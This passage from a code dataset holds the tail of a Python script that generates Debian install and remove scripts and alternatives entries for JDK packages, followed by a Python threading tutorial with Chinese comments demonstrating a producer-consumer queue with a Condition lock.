pathlib.Path(f'debian/{package_name_prefix}-cacerts.postinst')\n path.write_text(f'''\\\n#!/bin/sh\nset -e\n\ncase \"$1\" in\n\tconfigure)\n\t\tupdate-ca-certificates\n\t\tupdate-alternatives --install /{jvm}/{cacerts} {package_name_prefix}-cacerts /{jvm}/{cacerts}.system 20\n\t;;\nesac\n''')\n path.chmod(0o755)\n\n path = pathlib.Path(f'debian/{package_name_prefix}-cacerts.prerm')\n path.write_text(f'''\\\n#/bin/sh\nset -e\n\ncase \"$1\" in\n remove|deconfigure)\n update-alternatives --remove {package_name_prefix}-cacerts /{jvm}/{cacerts}.system\n rm /{jvm}/{cacerts}.system\n ;;\nesac\n''')\n path.chmod(0o755)\n\n path = pathlib.Path(f'debian/{package_name_prefix}-cacerts/etc/ca-certificates/update.d')\n path.mkdir(mode=0o755, parents=True)\n path /= f'{package_name_prefix}-cacerts'\n path.write_text(f'''\\\n#!/bin/sh\nexec trust extract --overwrite --format=java-cacerts --filter=ca-anchors --purpose server-auth /{jvm}/{cacerts}.system\n''')\n path.chmod(0o755)\n else:\n pkg_exe = set()\n for path in executables:\n dst_path = dst/path\n if not dst_path.exists():\n continue\n pkg_exe.add(path)\n name = pathlib.Path(path).name\n\n path = f'man/man1/{name}.1'\n src_path = src/path\n if src_path.exists():\n move(src_path, dst/path)\n pkg_exe -= jinfo_ignore\n executables.difference_update(pkg_exe)\n if pkg_exe:\n jinfo(package_name=package_name, exe=pkg_exe)\n pkg_exe_list = '\\n'.join(pkg_exe)\n\n path = pathlib.Path(f'debian/{package_name_prefix}-{package_name}.postinst')\n with open(path, 'w') as postinst:\n postinst.write(f'''\\\n#!/bin/sh\nset -e\n\njvm=/{jvm}\npriority={priority}\nexecutables='\n{pkg_exe_list}\n'\n\ncase \"$1\" in\n configure)\n for relpath in ${{executables}}; do\n name=$(basename \"${{relpath}}\")\n path=${{jvm}}/${{relpath}}\n link=/usr/bin/${{name}}\n slave_name=${{name}}.1.gz\n slave_path=${{jvm}}/man/man1/${{slave_name}}\n slave_link=/usr/share/man/man1/${{slave_name}}\n if [ -e \"${{slave_path}}\" ]; then\n update-alternatives --install \"${{link}}\" \"${{name}}\" \"${{path}}\" \"${{priority}}\" --slave \"${{slave_link}}\" \"${{slave_name}}\" \"${{slave_path}}\"\n else\n update-alternatives --install \"${{link}}\" \"${{name}}\" \"${{path}}\" \"${{priority}}\"\n fi\n done\n''')\n if package_name == 'jre-headless':\n postinst.write(f'''\n update-alternatives --install \"${{jvm}}/{cacerts}\" {package_name_prefix}-cacerts \"${{jvm}}/{cacerts}.oracle\" 10\n''')\n postinst.write('''\n ;;\nesac\n''')\n path.chmod(0o755)\n\n path = pathlib.Path(f'debian/{package_name_prefix}-{package_name}.prerm')\n with open(path, 'w') as prerm:\n prerm.write(f'''\\\n#!/bin/sh\nset -e\n\njvm=/{jvm}\nexecutables='\n{pkg_exe_list}\n'\n\ncase \"$1\" in\n remove|deconfigure)\n for relpath in ${{executables}}; do\n name=$(basename \"${{relpath}}\")\n update-alternatives --remove \"${{name}}\" \"${{jvm}}/${{relpath}}\"\n done\n''')\n if package_name == 'jre-headless':\n prerm.write(f'''\\\n update-alternatives --remove {package_name_prefix}-cacerts \"${{jvm}}/{cacerts}.oracle\"\n''')\n prerm.write(f'''\\\n ;;\nesac\n''')\n path.chmod(0o755)\n\njinfo_names = set()\n\ndef jinfo(package_name, exe):\n if package_name.endswith('-headless'):\n abbr = f'{package_name[:-9]}hl'\n if abbr == 'jrehl':\n abbr = 'hl'\n else:\n abbr = package_name\n\n for path in exe:\n name = pathlib.Path(path).name\n if name in jinfo_names:\n logging.warning(f'jinfo: duplicate entry, skipped {path}')\n continue\n jinfo_names.add(name)\n with open(jinfo_path, 'a') as jinfo:\n jinfo.write(f'{abbr} {name} /{jvm}/{path}\\n')\n\ndef substvars(package_name, meta):\n depends = meta.get('depends') or []\n recommends = meta.get('recommends') or []\n suggests = meta.get('suggests') or []\n provides = meta.get('provides') or []\n\n with open(f'debian/{package_name_prefix}-{package_name}.substvars', 'a') as substvars:\n substvars.write(f'''\\\n{package_name}:Depends={', '.join(depends)}\n{package_name}:Recommends={', '.join(recommends)}\n{package_name}:Suggests={', '.join(suggests)}\n{package_name}:Provides={', '.join(provides)}\n'''.replace('%prefix%', package_name_prefix))\n\ndef check_missing():\n file_left = find(r'find . ! -type d -printf \"%P\\0\" | sort -z')\n bad = False\n for path in file_left:\n if path.startswith('man/man1/') and path.endswith('.1'):\n # ignore man/ without corresponding bin/, occurred in jdk 11.0.12+8\n logging.warning(f'missing: {path}')\n else:\n logging.error(f'missing: {path}')\n bad = True\n for path in empty_directories:\n logging.error(f'missing: {path}')\n bad = True\n if bad:\n sys.exit(1)\n\ndef main():\n logging.basicConfig(\n stream=sys.stderr,\n level='INFO',\n format='[%(levelname)s] %(message)s',\n )\n prepare()\n logging.info('processing packages...')\n for package_name, meta in packages.items():\n if meta is None:\n meta = {}\n process(package_name=package_name, meta=meta)\n check_missing()\n\nif __name__ == '__main__':\n main()\n","sub_path":"package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":8757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"373707691","text":"\"\"\"\r\n线程--同步\r\n\r\n通知和等待\r\n\r\nwait: 等待,释放当前线程占用的锁\r\nnotify:任选一个等待线程\r\nnotifyall:通知所有等待的线程\r\n\"\"\"\r\n# 需求:\r\n\"\"\"\r\n生产者:生产商品 +1\r\n消费者:消费产品 -1\r\n如果仓库只能最多容纳3个产品,供大于求,当生产者商品数量达到3,生产者就不能再生产了,\r\n阻塞状态\r\n仓库中产品的数量是公共变量\r\n\r\n\"\"\"\r\n# sleep:单纯让线程阻塞,但是不能让当前的线程释放锁\r\n# wait: 让线程阻塞,同时释放锁\r\n\r\n# 当生产者释放锁了,消费者获得了锁,可以消费,现在面临着的问题:\r\n#(1)消费者一直消费,消费商品=0 wait\r\n#(2)生产者隔一段时间来仓库看一下商品是不是<3,如果是就可以生产\r\n#(3)如果消费者只要消费了商品,就通知生产者,可以生产了 notify\r\n\r\n#\r\nimport threading,time\r\nlock=threading.Condition()\r\n\r\n#定义生产者消费者\r\ndef produce(li):\r\n for i in range(4):\r\n try:\r\n lock.acquire()\r\n if len(li)==3:\r\n print(\"仓库已满,生产阻塞\")\r\n # 是的生产者等待,释放锁给消费者\r\n lock.wait()\r\n else:\r\n li.append(\"goods\")\r\n print(\"生产了{}\".format(i))\r\n lock.notify_all()\r\n finally:\r\n lock.release()\r\n\r\n\r\ndef consume(li):\r\n for i in range(4):\r\n try:\r\n lock.acquire()\r\n if len(li)==0:\r\n print(\"仓库已空,消费阻塞\")\r\n lock.wait()\r\n else:\r\n li.pop(0)\r\n print(\"消费了{}\".format(i))\r\n lock.notify_all()\r\n finally:\r\n lock.release()\r\n\r\nif __name__==\"__main__\":\r\n li=[]\r\n t1=threading.Thread(target=produce,args=(li,))\r\n t2=threading.Thread(target=consume,args=(li,))\r\n t1.start()\r\n t2.start()\r\n time.sleep(2)\r\n print(t1.is_alive())\r\n print(t2.is_alive())\r\n\r\n","sub_path":"code/day18/day18-1thread-notify.py","file_name":"day18-1thread-notify.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
link